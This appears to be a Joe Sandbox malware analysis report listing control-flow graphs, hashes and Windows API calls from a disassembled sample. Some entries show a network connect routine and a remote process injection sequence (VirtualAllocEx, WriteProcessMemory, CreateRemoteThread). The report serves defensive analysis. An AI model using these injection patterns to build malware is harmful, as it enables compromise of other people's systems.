                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddrFreeInfo$CleanupStartupclosesocketconnectgetaddrinfosocket
                                  • String ID: 50500
                                  • API String ID: 448659506-2230786414
                                  • Opcode ID: c6d10d9c020266da2ec55303449e8d7dcd22cb129d925c939ca34162db8897d3
                                  • Instruction ID: a0713b17bac363d3b7dd6cee9decf18312b2a3b330b57821b9cffb4a8dec8984
                                  • Opcode Fuzzy Hash: c6d10d9c020266da2ec55303449e8d7dcd22cb129d925c939ca34162db8897d3
                                  • Instruction Fuzzy Hash: D731C1729053419BD7209F24DD89B6EB7E5FF88B34F404B2DF8A492290D3769904DB92

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 128 10a2f0c-10a2f2e 129 10a3121 128->129 130 10a2f34-10a2f36 128->130 133 10a3123-10a3127 129->133 131 10a2f38-10a2f57 call 1092193 130->131 132 10a2f62-10a2f85 130->132 139 10a2f5a-10a2f5d 131->139 135 10a2f8b-10a2f91 132->135 136 10a2f87-10a2f89 132->136 135->131 138 10a2f93-10a2fa4 135->138 136->135 136->138 140 10a2fa6-10a2fb4 call 109bbed 138->140 141 10a2fb7-10a2fc7 call 10a2a51 138->141 139->133 140->141 146 10a2fc9-10a2fcf 141->146 147 10a3010-10a3022 141->147 148 10a2ff8-10a300e call 10a2622 146->148 149 10a2fd1-10a2fd4 146->149 150 10a3079-10a3099 WriteFile 147->150 151 10a3024-10a302a 147->151 169 10a2ff1-10a2ff3 148->169 152 10a2fdf-10a2fee call 10a29e9 149->152 153 10a2fd6-10a2fd9 149->153 155 10a309b-10a30a1 GetLastError 150->155 156 10a30a4 150->156 157 10a302c-10a302f 151->157 158 10a3065-10a3077 call 10a2ace 151->158 152->169 153->152 159 10a30b9-10a30bc 153->159 155->156 163 10a30a7-10a30b2 156->163 164 10a3051-10a3063 call 10a2c92 157->164 165 10a3031-10a3034 157->165 176 10a304c-10a304f 158->176 172 10a30bf-10a30c1 159->172 170 10a311c-10a311f 163->170 171 10a30b4-10a30b7 163->171 164->176 165->172 173 10a303a-10a3047 call 10a2ba9 165->173 169->163 170->133 171->159 177 10a30ef-10a30fb 172->177 178 10a30c3-10a30c8 172->178 173->176 176->169 181 10a30fd-10a3103 177->181 182 10a3105-10a3117 177->182 179 10a30ca-10a30dc 178->179 180 10a30e1-10a30ea call 109ac78 178->180 179->139 180->139 181->129 181->182 182->139
                                  APIs
                                    • Part of subcall function 010A2622: GetConsoleOutputCP.KERNEL32(C66D7777,00000000,00000000,?), ref: 010A2685
                                  • WriteFile.KERNELBASE(?,00000000,01096AF7,?,00000000,00000000,00000000,?,00000000,?,0108C023,01096AF7,00000000,0108C023,?,?), ref: 010A3091
                                  • GetLastError.KERNEL32(?,01096AF7,00000000,?,0108C023,?,00000000,00000000), ref: 010A309B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ConsoleErrorFileLastOutputWrite
                                  • String ID:
                                  • API String ID: 2915228174-0
                                  • Opcode ID: 3b9f435f2e44c98c66d94c32fd009c3eac640272b33abcf7c71f35ad061d8ab6
                                  • Instruction ID: baf1b9823331740acca16afdf427b163e54649d28ec0958f3812f1cdc14a4288
                                  • Opcode Fuzzy Hash: 3b9f435f2e44c98c66d94c32fd009c3eac640272b33abcf7c71f35ad061d8ab6
                                  • Instruction Fuzzy Hash: 1E61907190410AAFDF11DFE8C884EEEBFF9BF19304F4401A5E984AB246D776D9418BA0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 185 10a2582-10a2596 call 10a814e 188 10a2598-10a259a 185->188 189 10a259c-10a25a4 185->189 190 10a25ea-10a260a call 10a80bd 188->190 191 10a25af-10a25b2 189->191 192 10a25a6-10a25ad 189->192 202 10a261c 190->202 203 10a260c-10a261a call 109ac78 190->203 195 10a25d0-10a25e0 call 10a814e FindCloseChangeNotification 191->195 196 10a25b4-10a25b8 191->196 192->191 194 10a25ba-10a25ce call 10a814e * 2 192->194 194->188 194->195 195->188 206 10a25e2-10a25e8 GetLastError 195->206 196->194 196->195 204 10a261e-10a2621 202->204 203->204 206->190
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,010A2469,00000000,CF830579,010E1148,0000000C,010A2525,0109662D,?), ref: 010A25D8
                                  • GetLastError.KERNEL32(?,010A2469,00000000,CF830579,010E1148,0000000C,010A2525,0109662D,?), ref: 010A25E2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ChangeCloseErrorFindLastNotification
                                  • String ID:
                                  • API String ID: 1687624791-0
                                  • Opcode ID: d14cd48d84418a85dd22e2dc53b04df82304b0b0baf09c2545bd631600395321
                                  • Instruction ID: 58fde4ffb23055f1f800653dc968af960cafcc8491c69104ba21f2f5c8d75272
                                  • Opcode Fuzzy Hash: d14cd48d84418a85dd22e2dc53b04df82304b0b0baf09c2545bd631600395321
                                  • Instruction Fuzzy Hash: B0118E3360421056D67532FC5C58BBD3BC9BB86734FA902AAF9DA8F1C2EE71D8C08255

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 210 109bacc-109bae4 call 10a814e 213 109bafa-109bb10 SetFilePointerEx 210->213 214 109bae6-109baed 210->214 216 109bb12-109bb23 GetLastError call 109ac78 213->216 217 109bb25-109bb2f 213->217 215 109baf4-109baf8 214->215 219 109bb4b-109bb4e 215->219 216->215 217->215 218 109bb31-109bb46 217->218 218->219
                                  APIs
                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,010E0E00,0108C023,00000002,0108C023,00000000,?,?,?,0109BBD6,00000000,?,0108C023,00000002,010E0E00), ref: 0109BB08
                                  • GetLastError.KERNEL32(0108C023,?,?,?,0109BBD6,00000000,?,0108C023,00000002,010E0E00,00000000,0108C023,00000000,010E0E00,0000000C,01096BCE), ref: 0109BB15
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorFileLastPointer
                                  • String ID:
                                  • API String ID: 2976181284-0
                                  • Opcode ID: 92bf849b73a6c858d523b24c30bd88aead3c77f7c548daa6364456c61df35c11
                                  • Instruction ID: d985cd714397236b6c19a6cac90e51319b60e907108db90ceed27db64662a100
                                  • Opcode Fuzzy Hash: 92bf849b73a6c858d523b24c30bd88aead3c77f7c548daa6364456c61df35c11
                                  • Instruction Fuzzy Hash: C0014932610149AFCF198F5EDC55DEE3F69EB85330B240148F8919B2D1EAB1E941DB90

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 222 10a379c-10a37b0 GetLastError 223 10a37cc-10a37d6 call 10a4ea4 222->223 224 10a37b2-10a37ba call 10a4e65 222->224 231 10a37d8-10a37da 223->231 232 10a37dc-10a37e4 call 10a3e63 223->232 229 10a37bc-10a37c5 224->229 230 10a37c7 224->230 233 10a3841-10a384c SetLastError 229->233 230->223 231->233 235 10a37e9-10a37ef 232->235 236 10a3802-10a3810 call 10a4ea4 235->236 237 10a37f1-10a3800 call 10a4ea4 235->237 243 10a3829-10a383e call 10a3479 call 10a4823 236->243 244 10a3812-10a3820 call 10a4ea4 236->244 242 10a3821-10a3827 call 10a4823 237->242 251 10a3840 242->251 243->251 244->242 251->233
                                  APIs
                                  • GetLastError.KERNEL32(?,?,0109ACB4,010A48E0,?,?,0108E0EB,?,?,?,?,?,00FB2D8D,0108B16C,?,?), ref: 010A37A0
                                  • SetLastError.KERNEL32(00000000,?,?,0108B16C), ref: 010A3842
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast
                                  • String ID:
                                  • API String ID: 1452528299-0
                                  • Opcode ID: ab13f9e72ad61b44d361f7659d51cba00134b3904c54f324f193f33ceb966efc
                                  • Instruction ID: f6e4d2e07a8044f39b22373700a9b9ba63e0bf01a7a74d56644dd5a42bba7a9d
                                  • Opcode Fuzzy Hash: ab13f9e72ad61b44d361f7659d51cba00134b3904c54f324f193f33ceb966efc
                                  • Instruction Fuzzy Hash: 4411CC752083136ED77266F9ACC4EAF6AC8BF11BA97940178F5D4DE091DB958C048250

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 254 101ba20-101ba3f 255 101ba45-101ba58 254->255 256 101bb6c call fb2040 254->256 257 101ba83-101ba8b 255->257 258 101ba5a 255->258 263 101bb71 call fb1fa0 256->263 260 101ba94-101baa4 257->260 261 101ba8d-101ba92 257->261 262 101ba5c-101ba61 258->262 264 101bab3-101bab5 260->264 265 101baa6-101baab 260->265 261->262 266 101ba64-101ba65 call 108cd02 262->266 272 101bb76-101bb7b call 1092220 263->272 269 101bac7 264->269 270 101bab7-101bac5 call 108cd02 264->270 265->263 268 101bab1 265->268 275 101ba6a-101ba6f 266->275 268->266 274 101bac9-101baec 269->274 270->274 279 101bb43-101bb69 call 108e9e0 call 108ef60 274->279 280 101baee-101bb18 call 108e9e0 call 108ef60 274->280 275->272 281 101ba75-101ba81 275->281 290 101bb1a-101bb28 280->290 291 101bb2c-101bb40 call 108cf83 280->291 281->274 290->272 292 101bb2a 290->292 292->291
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0101BB71
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID:
                                  • API String ID: 118556049-0
                                  • Opcode ID: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
                                  • Instruction ID: c44299e98c1e181df525dfa44056d5dab0340b28c8901b1753b6669436cab377
                                  • Opcode Fuzzy Hash: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
                                  • Instruction Fuzzy Hash: 3A411172A001099BCB15EF6CDD806AEBBB5FF44251F1402A9E885EB249D774EE108BE1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 295 108cd02-108cd05 296 108cd14-108cd17 call 109b99c 295->296 298 108cd1c-108cd1f 296->298 299 108cd21-108cd22 298->299 300 108cd07-108cd12 call 109f248 298->300 300->296 303 108cd23-108cd27 300->303 304 108cd2d 303->304 305 fb1fa0-fb1ff0 call fb1f80 call 108e96b call 108e0c1 303->305 304->304
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00FB1FDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID:
                                  • API String ID: 2659868963-0
                                  • Opcode ID: 2544863b7403e42cd3b34f733f50a0597c57725032d590facefbe7b3a80da620
                                  • Instruction ID: b947c1a34733b7967ae3447e5a3989ebc376a4b906d70897331d82f68e013c26
                                  • Opcode Fuzzy Hash: 2544863b7403e42cd3b34f733f50a0597c57725032d590facefbe7b3a80da620
                                  • Instruction Fuzzy Hash: A701D63580430EA7DB14BFA9EC009DA7BAC9F11260B908626F6D4AA550FB70E59086A1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 312 10a3e63-10a3e6e 313 10a3e7c-10a3e82 312->313 314 10a3e70-10a3e7a 312->314 316 10a3e9b-10a3eac RtlAllocateHeap 313->316 317 10a3e84-10a3e85 313->317 314->313 315 10a3eb0-10a3ebb call 109acaf 314->315 322 10a3ebd-10a3ebf 315->322 318 10a3eae 316->318 319 10a3e87-10a3e8e call 10a1a03 316->319 317->316 318->322 319->315 325 10a3e90-10a3e99 call 109f248 319->325 325->315 325->316
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,0108B16C,?), ref: 010A3EA4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: dda46b82600f89233012f6048b0b422ad656bfbdb61598148c1ad9231912e459
                                  • Instruction ID: 53eae20955620b4b089bfcc6880338385048d181d2ba6d755aba5e5321423606
                                  • Opcode Fuzzy Hash: dda46b82600f89233012f6048b0b422ad656bfbdb61598148c1ad9231912e459
                                  • Instruction Fuzzy Hash: 94F0543260022667AB72AEF69C05B9BBB89BF41760B45C551AFC4DE1C0CB70E80486E4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 328 10a489d-10a48a9 329 10a48db-10a48e6 call 109acaf 328->329 330 10a48ab-10a48ad 328->330 337 10a48e8-10a48ea 329->337 332 10a48af-10a48b0 330->332 333 10a48c6-10a48d7 RtlAllocateHeap 330->333 332->333 335 10a48d9 333->335 336 10a48b2-10a48b9 call 10a1a03 333->336 335->337 336->329 340 10a48bb-10a48c4 call 109f248 336->340 340->329 340->333
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 010A48CF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 676fc5fa32e3c86cb1da34a30fadf6e69f6b0f47ea96ad6acfe36bdaba9945f4
                                  • Instruction ID: 0f17ce9d31bf94a3f89c5549c1f72fc28605db8a5709ae198a07a7bcdfca5f90
                                  • Opcode Fuzzy Hash: 676fc5fa32e3c86cb1da34a30fadf6e69f6b0f47ea96ad6acfe36bdaba9945f4
                                  • Instruction Fuzzy Hash: 3AE0653950129656FB6126EAAC1479F3AC8DF416A1F8D0261EDC4E75D0DBE5D810C2A1
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 00FBA7CD
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00FBA7DD
                                  • GetModuleHandleA.KERNEL32(?), ref: 00FBA845
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00FBA84C
                                  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 00FBA858
                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000), ref: 00FBA8D1
                                  • CloseHandle.KERNEL32(?), ref: 00FBA908
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 00FBA98D
                                  • ResetEvent.KERNEL32(00000000), ref: 00FBA996
                                  • CreateThread.KERNEL32(00000000,00000000,00FBA5B0,?,00000000,00000000), ref: 00FBA9BA
                                  • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00FBA9C6
                                  • RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 00FBAA0C
                                  • CloseHandle.KERNEL32(?), ref: 00FBAA4A
                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000001), ref: 00FBAA56
                                  • CloseHandle.KERNEL32(?), ref: 00FBAA71
                                  • CloseHandle.KERNEL32(00000000), ref: 00FBAAD5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Handle$Close$Process$AddressCreateCurrentEventModuleProcString$AnsiObjectOpenResetSingleThreadUnicodeWait
                                  • String ID: File
                                  • API String ID: 3800441322-749574446
                                  • Opcode ID: ec483ff7726f62fa3e3a53ccf388188ad054b2139dd5b5cd673b17414c1c87b0
                                  • Instruction ID: 23e999fd490bef1a51e74000be161610e593c9442a59545cf49d1abe15878d9d
                                  • Opcode Fuzzy Hash: ec483ff7726f62fa3e3a53ccf388188ad054b2139dd5b5cd673b17414c1c87b0
                                  • Instruction Fuzzy Hash: AAC1CE70D00248EBEF11CFA4DD85BEEBBB9EF15300F140069E945AB291E775A944DFA2
                                  APIs
                                  • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 00FCA16A
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00FCA186
                                  • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00FCA1BF
                                  • VirtualAllocEx.KERNEL32(?,00000000,00001000,00003000,00000040), ref: 00FCA1E9
                                  • WriteProcessMemory.KERNEL32(?,?,?,00000218,00000000), ref: 00FCA368
                                  • WriteProcessMemory.KERNEL32(?,?,00FC9FE0,00000110,00000000), ref: 00FCA388
                                  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,00000000), ref: 00FCA39B
